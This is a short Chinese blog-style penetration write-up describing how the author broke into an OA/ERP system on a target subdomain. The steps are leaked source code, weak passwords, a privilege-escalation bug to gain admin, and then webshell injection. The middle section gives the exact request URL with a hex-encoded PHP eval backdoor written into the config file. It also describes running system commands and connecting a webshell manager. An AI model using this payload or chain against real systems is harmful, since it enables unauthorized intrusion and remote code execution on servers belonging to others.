前言
不是星標不推送文章了。
師傅也不想吧~
快把極夢C設置成星標吧。
信息收集?
目標為jmc.com
收集到了一個子域名 erp.jmc.com子域名
發現子域名存在一個源碼泄漏漏洞。
其中oa.zip是源碼。
其余都是一個登錄頁面。
這里重點是oa的登錄頁面。
oa是信乎OA,根據oa.zip泄漏.找到了公司名單。存在幾個弱口令。

第一步查看歷史漏洞。
發現泄漏出來的漏洞,如果想getshell全部都在后臺。
后臺文件上傳getshell
后臺配置文件getshell
不過都需要是管理員的情況下。
如何獲取管理員呢?這里查看歷史漏洞沒有發現什么有價值的。???
這里利用了獨家秘方的一個越權漏洞。修改+新建把普通用戶改成了管理員。
PS:經過本地測試,這里修改后普通用戶會存在一些bug。謹慎使用!?????????

上傳webshell就簡單了。--網上很多教程。????
這里利用了后臺配置文件上傳進行getshell,??????
因為是寫入了配置文件,對目標頁面會有危險。????????????????????
在寫入后抓緊復原。
/index.php?a=changestyle&m=geren&d=system&ajaxbool=true&style=21,id=1,name=0x610A6576616C28245F504F53545B315D293B2F2F

清除COOKIES再登錄系統 --> 發包:/index.php?a=savecong&m=cog&d=system&ajaxbool=true&rnd=705961


根據教材走,這里就已經成功上傳了webshell。shell地址:http://erp.jmc.com/密碼為1

然后上傳一個新的馬,恢復配置文件。
無法進行命令執行。
全部亂碼。修改編碼也沒啥用。

這里要不把所有的webshell管理工具都嘗試一遍,要不就上傳php文件嘗試。
這里選擇了上傳phpinfo,發現并未禁用參數。
又上傳了system(whoami),發現也是可以成功執行的。
然后利用冰蝎成功命令執行。

HACK學習呀
安全圈
安全圈
商密君
HACK之道
LemonSec
中國信息安全
系統安全運維
安全圈
安全圈
系統安全運維